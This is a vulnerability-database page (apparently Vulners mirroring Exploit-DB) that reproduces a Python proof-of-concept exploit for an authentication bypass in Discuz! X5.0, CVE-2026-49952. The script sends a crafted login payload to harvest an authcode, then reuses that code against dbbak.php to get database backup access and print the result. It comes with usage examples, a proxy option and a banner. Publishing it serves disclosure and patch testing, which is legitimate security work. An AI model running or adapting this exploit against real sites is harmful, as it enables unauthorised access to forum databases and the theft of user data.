Lucene search
K

Discuz! X5.0 - Authentication Bypass

🗓️ 07 Jul 2026 00:00:00Reported by banyamerType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 8 Views

Discuz! X5.0 authentication bypass via dbbak.php using uc key encryption oracle to reuse tokens.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-49952
17 Jun 202609:04
githubexploit
Circl
CVE-2026-49952
15 Jun 202620:20
circl
CVE
CVE-2026-49952
15 Jun 202618:43
cve
Cvelist
CVE-2026-49952 Discuz! X5.0 Authentication Bypass via dbbak.php Encryption Oracle
15 Jun 202618:43
cvelist
EUVD
EUVD-2026-36792
15 Jun 202621:30
euvd
NVD
CVE-2026-49952
15 Jun 202620:16
nvd
Packet Storm
📄 Discuz! X5.0 Authentication Bypass
7 Jul 202600:00
packetstorm
Positive Technologies
PT-2026-49307
15 Jun 202600:00
ptsecurity
Vulnrichment
CVE-2026-49952 Discuz! X5.0 Authentication Bypass via dbbak.php Encryption Oracle
15 Jun 202618:43
vulnrichment
# Exploit Title:     Discuz! X5.0 - Authentication Bypass
# CVE:                  CVE-2026-49952
# Date:                 2026-06-26
# Exploit Author:       Mohammed Idrees Banyamer
# Author Country:       Jordan
# Instagram:            @banyamer_security
# Author GitHub:        https://github.com/mbanyamer
# Author Blog  :        https://banyamersecurity.com/blog/
# Vendor Homepage:      https://www.discuz.vip
# Software Link:        https://www.discuz.vip
# Affected:             Discuz! X5.0 (20260320 - 20260501)
# Tested on:            Discuz! X5.0
# Category:             WebApps
# Platform:             PHP
# Exploit Type:         Authentication Bypass
# CVSS:                 9.1
# Description:          Discuz! X5.0 suffers from an authentication bypass vulnerability via dbbak.php using UC_KEY encryption oracle allowing token reuse.
# Fixed in:             20260510+
# Usage:
#   python3 exploit.py <target>
#
# Examples:
#   python3 exploit.py http://target.com
#   python3 exploit.py https://target.com --proxy http://127.0.0.1:8080
#
# Options:
#   --proxy   HTTP proxy
#
# Notes:
#   • Tune payload if needed (e.g. admin|1|0|0)
#
# How to Use
#
# Step 1:
#   Run the script against the target
#
# Step 2:
#   Check if dbbak.php access is granted

import requests
import re
import sys
import argparse
import urllib.parse
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def banner():
    print(r"""
╔██████╗  █████╗ ███╗   ██╗██╗   ██╗ █████╗ ███╗   ███╗███████╗██████╗╗
║██╔══██╗██╔══██╗████╗  ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║
║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗  ███████╔╝
║██╔══██╗██╔══██║██║╚██╗██║  ╚██╔╝  ██╔══██║██║╚██╔╝██║██╔══╝  ██╔══██╗
║██████╔╝██║  ██║██║ ╚████║   ██║   ██║  ██║██║ ╚═╝ ██║███████╗██║  ██║
╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝   ╚═╝  ╚═╝╚═╝     ╚═╝╚══════╝╚═╝  ╚═╝
        ╔═╗ Banyamer Security ╔═╗
""")

def get_authcode(target, payload, proxy):
    url = f"{target}/member.php?mod=logging&action=login&lssubmit=yes"
    data = {
        "username": payload,
        "password": "dummy123",
        "loginsubmit": "yes"
    }
    proxies = {"http": proxy, "https": proxy} if proxy else None
    try:
        r = requests.post(url, data=data, proxies=proxies, verify=False, allow_redirects=False, timeout=15)
        match = re.search(r'authcode=([a-zA-Z0-9]{20,})', r.text)
        if match:
            return match.group(1)
        match = re.search(r'([a-zA-Z0-9]{32,60})', r.text)
        if match:
            return match.group(1)
        return None
    except:
        return None

def exploit_dbbak(target, authcode, proxy):
    url = f"{target}/api/db/dbbak.php?code={urllib.parse.quote(authcode)}&operation=backup&appid=1"
    proxies = {"http": proxy, "https": proxy} if proxy else None
    try:
        r = requests.get(url, proxies=proxies, verify=False, timeout=15)
        print(f"[+] dbbak.php status: {r.status_code}")
        if r.status_code == 200:
            print("[+] Success! Access to database backup granted.")
            print(r.text[:400])
        else:
            print("[-] Failed or access denied.")
    except:
        print("[-] Request failed.")

def main():
    banner()
    parser = argparse.ArgumentParser(description="Discuz! X5.0 CVE-2026-49952 PoC")
    parser.add_argument("target", help="Target URL")
    parser.add_argument("--proxy", help="HTTP proxy", default=None)
    parser.add_argument("--payload", help="Oracle payload", default="admin|1|0|0")
    args = parser.parse_args()
    target = args.target.rstrip("/")
    print(f"[*] Target: {target}")
    print(f"[*] Payload: {args.payload}")
    authcode = get_authcode(target, args.payload, args.proxy)
    if authcode:
        print(f"[+] Authcode: {authcode}")
        exploit_dbbak(target, authcode, args.proxy)
    else:
        print("[-] Failed to get authcode.")

if __name__ == "__main__":
    main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jul 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.1
CVSS 49.3
EPSS0.0046
SSVC
8